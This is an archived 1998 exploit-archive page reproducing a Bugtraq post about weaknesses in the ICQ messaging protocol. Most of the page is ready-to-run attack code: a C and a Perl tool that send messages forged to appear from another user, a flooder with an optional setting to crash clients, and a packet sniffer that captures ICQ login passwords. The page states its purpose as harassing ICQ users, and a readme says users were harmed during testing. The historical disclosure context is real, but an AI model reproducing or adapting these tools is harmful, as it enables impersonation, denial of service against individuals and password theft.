ICQ Spoofer

Summary
Description:The ICQ protocol is poorly designed and leads to a number of problems. Included in this message is an ICQ spoofer in C, a Perl version, and an ICQ flooder. A sniffer is also included.
Author:Seth McGann <smm@WPI.EDU> and others
Compromise:Harass ICQ users to no end :).
Vulnerable Systems:People running ICQ, mostly windows users. There is probably a Mac client too.
Date:6 April 1998
Notes:All the code is somewhat jumbled together -- I'm sure you can figure it out.
Details


Date: Mon, 6 Apr 1998 19:10:48 -0400
From: Seth McGann <smm@WPI.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: The ICQ exploitation Center - www.wpi.edu/~smm/icq

Do to the unbelievable popularity of the ICQ spoofing program, I have put a
web page that holds the latest version of the (not so working) tool posted
as well as other useful information.  I know this post may not be up to the
exacting standards of BUGTRAQ but from the hundreds of emails I have
received I believe it is of enough interrest that everyone should know
about it.

Thank you for your time,

Seth M. McGann / smm@wpi.edu        "Security is making it
http://www.wpi.edu/~smm              to the bathroom in time."
KeyID: 1024/2048/177B6415
Fingerprint 5E87 5E5C 8FD9 1FFB 7836  C590 BA81 C796 177B 6415

/* icqspoof.c -  This program sends a message to a given ICQ user and it
* will appear to be from an arbitrary UIN. Loads of fun.
*
*  Notes:
*  As many of you know icqflood.c has been distributed by enkil^ and irQ.
*  They claim their program is all their own work.  Yet the "header" they
* use contains MY UIN.  Strange, eh?
* A simple, "Packet Dump that we based our exploit on provided by Seth
* McGann" would have been enough.  Even though I didn't specifically
* request credit it might have been nice to say something.  In the future
* when you expand on someone's idea and work (yeah those traces didn't fall
* out of the sky ya know) give credit where credit is due.
*
* Concept, Protocol Analysis and Coding: Seth McGann
* Some functions dealing with socket scanning: icqflood.c by enkil^ and irQ
* With help from my roomate (target practice)
* And yes, this still works with ICQ 98. Coming soon: Chat and File Spoofing
*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>

int main(argc, argv)
int argc;
char *argv[];
{
  struct sockaddr_in sin;
        int sock,i,x,y;
        unsigned long uin;
        int Port;

  char buffer[16];
  int connected = 1;
  typedef struct icq_prot {
  unsigned char magicNum[2];
  unsigned char UIN[4];
  unsigned char unknown[4];
  unsigned char unknown2[2];
  unsigned char length[2];
  unsigned char strng[256];
  } icq_prot;
  icq_prot sendMessage;
  unsigned long temp;
  unsigned char bigguy[1024];
  if (argc != 6) {
    fprintf(stderr,"Usage:  icqspoof ip SpoofedUIN message startport endport\n");

    exit(1);
  }
  Port = ScanPort(argv[1],atoi(argv[4]),atoi(argv[5]));
  if (Port == -1) {
                printf("No ICQ Port Found =(\n");
                return;
  }

  sendMessage.magicNum[0]=0x2e;
  sendMessage.magicNum[1]=0x0;
  sendMessage.unknown[0]=0x04;
  sendMessage.unknown[1]=0x01;
  sendMessage.unknown[2]=0x0F;
  sendMessage.unknown[3]=0x0;
  sendMessage.unknown2[0]=0x01;
  sendMessage.unknown2[1]=0x0;
  temp=atol(argv[2]);
  sendMessage.UIN[0]=temp & 0xFF;
  sendMessage.UIN[1]=(temp >> 8) & 0xFF;
  sendMessage.UIN[2]=(temp >> 16) & 0xFF;
  sendMessage.UIN[3]=0;
  strncpy(sendMessage.strng,argv[3],256);
  sendMessage.length[0]=strlen(sendMessage.strng)+1;
  sendMessage.length[1]=0;

  if (!(sock = socket(AF_INET, SOCK_STREAM, 0))) {
                        printf("Error: Unable to creat socket, Exiting.\n");
                        exit(1);
                }
  sin.sin_family = AF_INET;
                sin.sin_addr.s_addr = inet_addr(argv[1]);
                sin.sin_port = htons(Port);

   if (connect(sock, (struct sockaddr*)&sin,sizeof(sin))==-1) {
                        printf("Error Connecting to Socket\n");
                        return;
   }



  x=20;
   bigguy[0]=(41+strlen(sendMessage.strng)+1) & 0xFF;
   bigguy[1]=((41+strlen(sendMessage.strng)+1) >> 8) & 0xFF;
 
  bigguy[2]=sendMessage.UIN[0];
  bigguy[3]=sendMessage.UIN[1];
  bigguy[4]=sendMessage.UIN[2];
  bigguy[5]=sendMessage.UIN[3];
  bigguy[6]=0x02;
  bigguy[7]=0x00;
  bigguy[8]=0xEE;
  bigguy[9]=0x07;
  bigguy[10]=0x00;
  bigguy[11]=0x00;
  bigguy[12]=sendMessage.UIN[0];
  bigguy[13]=sendMessage.UIN[1];
  bigguy[14]=sendMessage.UIN[2];
  bigguy[15]=sendMessage.UIN[3];
  bigguy[16]=0x01;
  bigguy[17]=0x00;
  bigguy[18]=sendMessage.length[0];
  bigguy[19]=sendMessage.length[1];
  for(i=0;i<sendMessage.length[0];i++)
  bigguy[x++]=sendMessage.strng[i];
  bigguy[x++]=0x82;
  bigguy[x++]=0xD7;
  bigguy[x++]=0xF3;
  bigguy[x++]=0x20;
  bigguy[x++]=0x82;
  bigguy[x++]=0xD7;
  bigguy[x++]=0xF3;
  bigguy[x++]=0x20;
  bigguy[x++]=0x09;
  bigguy[x++]=0x04;
  bigguy[x++]=0x00;
  bigguy[x++]=0x00;
  bigguy[x++]=0x04;
  bigguy[x++]=0x00;
  bigguy[x++]=0x00;
  bigguy[x++]=0x10;
  bigguy[x++]=0x01;
  bigguy[x++]=0xEB;
  bigguy[x++]=0xFF;
  bigguy[x++]=0xFF;
  bigguy[x++]=0xFF;
  bigguy[x++]=0x02;
  bigguy[x++]=0x00;
  bigguy[x++]=0x0A;
  bigguy[x++]=0x09;
  bigguy[x++]=0x00;   
  write(sock,bigguy,x-1);
  printf("Done!\n");
  close(sock);
  return 0;
}

int ScanPort(char *ipaddr, int StartIP, int EndIP) {
        struct sockaddr_in sin;
        int sock,x,y;
        unsigned long uin;
        printf("Scanning Ports");
        for (x=StartIP;x<=EndIP;++x) {
                if (!(sock = socket(AF_INET, SOCK_STREAM, 0))) {
                        printf("Error: Unable to connect\n");
                        return -1;
                }
                sin.sin_family = AF_INET;
                sin.sin_addr.s_addr = inet_addr(ipaddr);
                sin.sin_port = htons(x);

                if (connect(sock, (struct sockaddr*)&sin,sizeof(sin))!=-1) {
                        close(sock);
                        printf("Port %d Open! Spoofing...\n",x);
                        fflush(stdout);
                        return x;
                }
                printf(".");
                fflush(stdout);
        }
        printf("\n");
        return -1;
}
-------------------------------------------------
  ---------------------------------------------
  - icqflood.c, ICQ Message Flooder for Linux -
  -         Created by enkil^ and irQ         -
  ---------------------------------------------

----------------------GREETZ---------------------
-                                               -
- #c0de cause they bitchez, #ICQ for being our  -  Well, here it is:
-   unwilling "crash" test dummies, dj0rpheus   -  A program capible
-     because he wilingly "felt the fury",      -  of exploiting the
-              and to Realistic:                -  terrible blind trust
-          "that's nice ya cumbubble"           -  protocol that the ICQ
-                                               -  client/server use
--------------------[WARNING]-------------------- 
-                                               -  This is being released
-  ICQ users WERE harmed during the testing of  -  to CLUE MIRIBILIS IN!
-                  this product                 -  
-                                               -  Fix it, fuck this is
----------------------USAGE----------------------  almost sickening...
-                                               -   
-          icqfld <ip> <num> <sp> <p>           - 
-                                               -
--------------------ARGUMENTS--------------------  Use this program
-                                               -  code at your own
- <ip>  - IP Address of user to flood           -  risk. 
- <num> - Number of Messages to flood user with -
- <sp>  - port to start scanning at             -  If your going to 
- <ep>  - port at which to end scanning         -  re-do our code,
-                                               -  or use it in your
-------------------------------------------------  creations, credit us.
 
						   enkil&irq.


icqflood: icqflood.c
	gcc -o icqfld icqflood.c
/*
 * ICQ Message Flooder by enkil^ and irQ
 * Arguments:
 * 	<ip> - IP Address of user to flood
 *	<number of messages> - Number of Messages to flood user with
 *	<start port> - port to start scanning at
 *	<end port> - port at which to end scanning
 * PLEASE READ THE `README' FILE FOR DISCLAIMER AND GREETZ!
 */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>

/*
 * Un Comment this if you would like to crash the other users ICQ instead
 * Will not work on icq98, must re-compile to use.
 */
//#define  CRASH 16

/*
 * Program (icqflood) Version
 */
#define VER	"v1.0"

/*
 * Converts 3 characters into a UIN (reverse byte order decimal)
 */ 
#define UIN(c,b,a) ((a << 16) | (b << 8) | c)

/*
 * the data to be sent to the user
 * This is the data that represents a message (client to client... 
 * not through the server)
 */
unsigned char i_header[] = {
	0x8C,0xDD,0x33,0x00,0x02,0x00,0xEE,0x07,
	0x00,0x00,0x8C,0xDD,0x33,0x00,0x01,0x00,
	0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x82,0xD7,0xF3,0x20,0x82,0xD7,0xF3,0x20,
	0x09,0x04,0x00,0x00,0x04,0x00,0x00,0x00,
	0xED,0xFF,0xFF,0xFF
};

/*
 * Function: ScanPort
 * Scans ports within a range (StartIP to EndIP)
 */
int ScanPort(char *ipaddr, int StartIP, int EndIP) {
	struct sockaddr_in sin;
	int sock,x,y;
	unsigned long uin;
	printf("Scanning Ports");
	for (x=StartIP;x<=EndIP;++x) {
        	if (!(sock = socket(AF_INET, SOCK_STREAM, 0))) {
               		printf("Error: Unable to connect\n");
			return -1;
		}
		sin.sin_family = AF_INET;
        	sin.sin_addr.s_addr = inet_addr(ipaddr);
	       	sin.sin_port = htons(x);
	        	
		if (connect(sock, (struct sockaddr*)&sin,sizeof(sin))!=-1) {
			close(sock);
			printf("Port %d Open! Flooding...\n",x);
			fflush(stdout);
			return x;
		} 
		printf(".");
		fflush(stdout);
	}
	printf("\n");
	return -1;
}

/*
 * Function: Usage
 * Displays the USAGE for icqfld
 */
void Usage(char *EXEName) {
	printf("* ICQ Message Flooder %s by enkil^ and irQ\n",VER);
	printf("* Usage: %s <ip> <number of messages> <start port> <end port>\n",EXEName);
	printf("* Arguments:\n");
	printf("* 	<ip> - IP Address of user to flood\n");
	printf("*	<number of messages> - Number of Messages to flood user with\n");
	printf("*	<start port> - port to start scanning at\n");
	printf("*	<end port> - port at which to end scanning\n");
}

/*
 * Function: main
 * Main loop, open socket... send the message... close socket (repeat for firm
 * abs and thighs)
 */
void main(int argc, char *argv[]) {
	struct sockaddr_in sin;
	int sock,x,y;
	unsigned long uin;
	int Port;

        if (argc < 5) {
		Usage(argv[0]);
		exit(1);
 	}
	printf("ICQ Message Flooder %s by enkil^ and irQ\n",VER);
	fflush(stdout);
	srand(time());

	Port = ScanPort(argv[1],atoi(argv[3]),atoi(argv[4]));

	if (Port == -1) {
		printf("No ICQ Port Found =(\n");
		return;
	}

	printf("Flooding %s on port %d, %d times -\n",argv[1], Port, atoi(argv[2]));
	fflush(stdout);
	for (y=0;y<atoi(argv[2]);++y) {
	        if (!(sock = socket(AF_INET, SOCK_STREAM, 0))) {
        	        printf("Error: Unable to creat socket, Exiting.\n");
			exit(1);
		}
		sin.sin_family = AF_INET;
        	sin.sin_addr.s_addr = inet_addr(argv[1]);
       		sin.sin_port = htons(Port);

		for (x=0;x<3;++x) i_header[x] = i_header[x+10] = (rand() % 256);
		for (x=0;x<6;++x) i_header[18+x] = (rand() % 256);
/* 
 * changes the header so that ICQ can't handle it
 */
#ifdef CRASH
		i_header[CRASH]=0x07;
#endif	        	
		if (connect(sock, (struct sockaddr*)&sin,sizeof(sin))==-1) {
			printf("Error Connecting to Socket\n");
			return;
		} 

	        write(sock, "\x2E\x00", 2);
       		write(sock, &i_header,sizeof(i_header));
        	write(sock, "\x28\x00", 2);

		uin = UIN(i_header[0],i_header[1],i_header[2]);

		printf("Message Sent, UIN = %d\n",uin);

		fflush(stdout);
		close(sock);
	}
	printf("Done!\n");
	exit(0);

}

###############################################################################
# icq_spoof.pl - A re-write of icqspoof.c from Seth McGann in Perl.  Requires #
#                the Perl5 socket library, but should work on any Unix you    #
#                can find that's got Perl5 for it... the only system-specific #
#                chunks are the truncate function, and the alarm used to      #
#                make a timeout on the connect().  Runs smoothly under Linux  #
#                2.0.32, Perl 5.003.                                          #
#                                                                             #
#                (C) 1998, Andrew Hobgood [Kha0S@EFNet#LinuxOS]               #
#                                                                             #
#                Based on code from Seth McGann (smm@wpi.edu).  All port scan #
#                code is my own.  If you don't like the way I code, deal with #
#                it.  I wrote this between 2 and 4 in the morning and learned #
#                some pack() syntax along the way.                            #
############################################################################### 
# As for greetz, I'd first like to thank my guinea pigs: gears, magnwa, and   #
# warday.  Thanks to Seth for the dumps and format, EFNet #Perl for helping   #
# with my stupid questions, and to I-don't-know-who for the IceyJ00.  Enjoy.  #
###############################################################################

print "Perl ICQ Spoofer v1.0 - Kha0S [andrewh\@wpi.edu]\n";

# Dumbass... you didn't give us enough arguments.
if($#ARGV-4) {
	print STDERR<<EOH;
Usage: 	$0 <hostname> <UIN> <message> <start port> <end port>

	<hostname>	The target host of the spoofed ICQ message
	<UIN>		The UIN of the spoofed message source
	<message>	The message you want to send (in quotes)
	<start port>	The beginning port to scan for ICQ
	<end port>	The ending port to scan for

Tips:	A good port range is 1000-2000, although 1000-6000 will give you
	more reliable (albeit possibly slower) results.
EOH
	exit(1);
}

use Socket;

$uin = $ARGV[1]; $port = $ARGV[3]-1; $| = 1;
$message = $ARGV[2]; truncate $message, 255;

$proto = getprotobyname('tcp') || 6;
die("gethostbyname: $!") unless ($address = (gethostbyname($ARGV[0]))[4]);

print "Sending spoofed ICQ message to $ARGV[0] from UIN:$ARGV[1]...\n"; 

# This data format is the only stuff that I've really borrowed from icqspoof.c
@uin	= ($uin & 0xFF, ($uin >> 8) & 0xFF, ($uin >> 16) & 0xFF, 0);
$data	= pack('C*', (length($message) + 42) & 0xFF, ((length($message) + 42) >> 8) & 0xFF, (@uin),2,0,0xEE,7,0,0,(@uin),1,0,length($message)+1,0).$message.pack('C*',0,0x82,0xD7,0xF3,32,0x82,0xD7,0xF3,0x20,9,4,0,0,4,0,0,16,1,0xEB,255,255,255,2,0,10,9);

print "Beginning port scan at ", $port+1, " ";
while($port++<=$ARGV[4]) {
	if(&Check_Port($address, $port, $proto)) {
		print "\nFound open port $port!  Sending spoofed data... ";
		syswrite(ICEYJ00, $data, length($data));
		print "done.\n";
		exit(0);
	} else {
		print ".";
	}
}
print "\nOh well... unable to find the ICQ port.  Try again with a different range.\n";
exit(1);

sub Check_Port { my($address, $port, $proto) = @_;
	die("socket: $!") unless socket(ICEYJ00, AF_INET(), SOCK_STREAM(), $proto);
	eval {
# Set up a timeout of 2 seconds on the connect, change to suit taste
		local $SIG{ALRM} = sub { return(0) };
		alarm 2;
		return(defined(connect(ICEYJ00, pack('S n a4 x8', AF_INET(), $port, $address))));
		alarm 0;
	}
}

/*

[ http://www.rootshell.com/ ]

This is a little toy to demo the weaknesses in Mirabilis ICQ system. There
are two major problems with the ICQ protocol clearly visible. As its an
unpublished proprietary system we can assume there may well be far more
lurking. Its also too apparent why they dont publish it - my guess has to
be "embarrasment factor"

The first flaw is plain dumb. They send plaintext authentication. Not only
that they send it once per session.

The second flaw is that they use easily guessable sequence numbers - starting
from 0 each user session, they use UDP and to make life even easier their
query service will tell you exactly what IP address to spoof as source when
faking them. So you can find someone is on, find their IP and spoof sequences
0->100 with a fair bet that somewhere before the 100th fake message you'll
get several hits and spoof messages. If not you can winnuke the victim so
he'll be back on a low sequence number 8)

Let us hope the proposed Rendezvous Protocol that is supposed to become
an internet draft is better designed and that the ICQ people switch to it.
There really is no excuse for using crude plaintext and simplistic sequence
spaces when five minutes thought could have resolved almost every weakness
except password change without US export controlled crypto.

I've enclosed a demo that does password sniffing for ICQ. It requires you
can work out how to set it up and it doesnt including spoofing code.

Alan

*/

/*
 *      Snoop ICQ traffic for a set host. Shows how simplistic ICQ is and
 *      how easy it is to snoop it.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <ctype.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <linux/ip.h>
#include <linux/udp.h>

/*
 *      PUT THE IP ADDRESS OF THE CLIENT TO SNOOP HERE OR IT WONT WORK
 */

#define MY_CLIENT_TO_WATCH      0x7F000001

static int create_socket(void)
{
        int s=socket(AF_INET, SOCK_PACKET, htons(ETH_P_ALL));
        if(s==-1)
        {
                perror("socket");
                exit(1);
        }
        return s;
}

static void close_socket(int s)
{
        close(s);
}

static void promiscuous(int s, char *iface, int onoff)
{
        struct ifreq ifr;
        strcpy(ifr.ifr_name, iface);

        if(ioctl(s, SIOCGIFFLAGS, &ifr)==-1)
        {
                perror("SIOCGIFFLAGS");
                exit(1);
        }

        strcpy(ifr.ifr_name, iface);
        if(onoff)
                ifr.ifr_flags|=IFF_PROMISC;
        else
                ifr.ifr_flags&=~IFF_PROMISC;
        if(ioctl(s, SIOCSIFFLAGS, &ifr)==-1)
        {
                perror("SIOCSIFFLAGS");
                exit(1);
        }
}

static __inline__ ip_p(unsigned char *packet, int len)
{
        if(packet[12]==0x08 && packet[13]==0x00)
                return 1;
        return 0;
}

struct icqhdr
{
        unsigned char version[2] __attribute((packed)); /* ?? */
        unsigned short command __attribute((packed));
        unsigned short sequence __attribute((packed));
        unsigned long uid __attribute((packed));
        unsigned char data[0];
};

struct icqack
{
        unsigned char version[2] __attribute((packed)); /* ?? */
        unsigned short result __attribute((packed));
        unsigned short sequence __attribute((packed));
        unsigned char data[0];
};

struct icqstring
{
        unsigned short len;
        char data[0];
};

struct icqlogin
{
        struct icqhdr hdr __attribute((packed));
        unsigned long dunno __attribute((packed)); /* 000006FE.L */
        unsigned short pw_len __attribute((packed));
        unsigned char pw_data[11] __attribute((packed));
        struct in_addr addr __attribute((packed));
        /* Rest is a mystery right now */
        /* 0.L */
        /* 2.L */
        /* 0000004C, 00000000 */
        /* 00 78 */
};

static void print_icq_string(struct icqstring *s)
{
        fwrite(s->data, s->len-1, 1, stdout);
}

/*
 *      Scan a packet for clues
 */

static int process_packet(struct sockaddr *sa, unsigned char *packet, int len)
{
        int i;
        int lv;
        int d=0;
        static long num=0;
        struct iphdr *iph;
        struct udphdr *udphdr;
        if(strcmp(sa->sa_data,"eth0"))
                return 0;               /* Wrong port */
        if(!ip_p(packet, len))
                return 0;

        iph=(struct iphdr *)(packet+14);
        udphdr=(struct udphdr *)(iph+1);
        /* assume no options */

        lv=ntohs(udphdr->len);

        if( udphdr->source !=htons(4000) && udphdr->dest!=htons(4000))
        {
                return 0;
        }

/*      printf("packet %d   \r", ++num);*/

        if(iph->saddr==htonl(MY_CLIENT_TO_WATCH))
        {
                printf("To Server: %d bytes\n", lv);
        }
        else if(iph->daddr==htonl(MY_CLIENT_TO_WATCH))
        {
                printf("From Server: %d bytes\n", lv);
                d=1;
        }
        else return 0;

        i=14+sizeof(struct iphdr);
        if(len-i>lv)
                len=i+lv;

        i+=sizeof(struct udphdr);

/*      printf("UDP size %d\n",i);*/
        if(i>=sizeof(struct icqhdr)+sizeof(struct udphdr))
        {
                struct icqhdr *p=(struct icqhdr *)(udphdr+1);
                if(d==0)
                {
                        printf("From %ld\n",p->uid);
                        printf("Version: %d.%d\nCommand ",
                                p->version[1], p->version[0]);
                        switch(p->command)
                        {
                                case 0x000A:
                                        printf("Ack");
                                        break;
                                case 0x03E8:
                                {
                                        struct icqlogin *il=(struct icqlogin *)p;
                                        printf("Login Password ");
                                        print_icq_string((struct icqstring *)&il->pw_len);
                                        printf(" IP %s", inet_ntoa(il->addr));
                                        break;
                                }
#if 0
                                case 0x0x??
                                {
                                        struct in_addr v=*(struct in_addr *)p->data;
                                        printf("Ping %s", inet_ntoa(v));
                                        break;
                                }
#endif
                                case 0x409:
                                {
                                        printf("Ping");
                                        break;
                                }
                                case 0x0438:
                                {
                                        struct icqstring *s=(struct icqstring *)p->data;
                                        printf("Disconnect (");
                                        print_icq_string(s);
                                        printf(")");
                                        break;
                                }
                                case 0x0456:
                                {
                                        /* data +4,5 is always 0100 */
                                        struct icqstring *s=(struct icqstring *)(p->data+6);
                                        printf("Message to %ld  ", *((long *)p->data));
                                        print_icq_string(s);
                                        break;
                                }
                                case 0x0460:
                                {
                                        printf("Information %ld on ID %d",
                                                *((short *)p->data),
                                                *((long *)(p->data+2))
                                        );
                                        break;
                                }
                                case 0x046A:
                                {
                                        printf("Information_2 %ld on ID %d",
                                                *((short *)p->data),
                                                *((long *)(p->data+2))
                                        );
                                        break;
                                }
                                case 0x04D8:
                                {
                                        printf("Status ");
                                        switch(*((long *)p->data))
                                        {
                                                case 0x00:
                                                        printf("[Away 0]");
                                                        break;
                                                case 0x01:
                                                        printf("[Away 1]");
                                                        break;
                                                case 0x10:
                                                        printf("[DND 0]");
                                                        break;
                                                case 0x11:
                                                        printf("[DND 1]");
                                                        break;
                                                default:
                                                        printf("%04X",
                                                                *((long *)p->data));
                                        }

                                        break;
                                }
                                default:
                                        printf("%04X", p->command);
                        }
                        if(p->sequence)
                                printf("\nSequence %d\n",
                                        p->sequence);
                        else
                                printf("\n");
                }
        }
        if(i>=sizeof(struct icqack)+sizeof(struct udphdr))
        {
                struct icqack *p=(struct icqack *)(udphdr+1);
                if(d==1)
                {
                        printf("Version: %d.%d\nReply ",
                                p->version[1], p->version[0]);
                        switch(p->result)
                        {
                                case 0x000A:
                                        printf("Ack");
                                        break;

                                case 0x00E6:
                                        printf("Away Reply ");
                                        printf("for %ld",
                                                *((long *)p->data));
                                        break;

                                case 0x0118:
                                {
                                        struct icqstring *is;
                                        printf("InfoID %d\n",
                                                *((short *)p->data));
                                        printf("ICQ ID %ld\n",
                                                *((long *)p->data+2));
                                        is=(struct icqstring *)(p->data+6);
                                        printf("Nick ");
                                        print_icq_string(is);
                                        is=(struct icqstring *)(((char *)is)+is->len+2);
                                        printf("\nName ");
                                        print_icq_string(is);
                                        is=(struct icqstring *)(((char *)is)+is->len+2);
                                        printf(" ");
                                        print_icq_string(is);
                                        is=(struct icqstring *)(((char *)is)+is->len+2);
                                        printf("\nEMail ");
                                        print_icq_string(is);
                                        is=(struct icqstring *)(((char *)is)+is->len+2);
                                        printf("\nInfo ");
                                        print_icq_string(is);
                                        break;
                                }
                                default:
                                        printf("%04X", p->result);
                        }
                        if(p->sequence)
                                printf("\nSequence %d\n",
                                        p->sequence);
                        else
                                printf("\n");
                }
        }

        while(i<len)
        {
                int x;
                for(x=0; x<8 && i+x<len; x++)
                {
                        printf("%02X ", packet[i+x]);
                }
                printf("    ");
                for(x=0;x<8 && i+x<len; x++)
                {
                        unsigned char c=packet[i+x];
                        if(c>=32 && c< 127)
                                printf("%c", c);
                        else
                                printf(".");
                }
                printf("\n");
                i+=8;
        }
        printf("\n");
        fflush(stdout);
        return 0;
}

int main(int argc, char *argv[])
{
        int s;
        unsigned char buf[1600];
        struct sockaddr sa;
        int salen;
        int len;

        s=create_socket();
        promiscuous(s, "eth0", 1);

        while(1)
        {
                salen=sizeof(sa);
                if((len=recvfrom(s, (char *)buf, 1600, 0, &sa, &salen))==-1)
                {
                        perror("recvfrom");
                        close_socket(s);
                        exit(1);
                }
                process_packet(&sa, buf,len);
        }
        printf("An error has occured.\n");
        close_socket(s);
        exit(0);
}


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: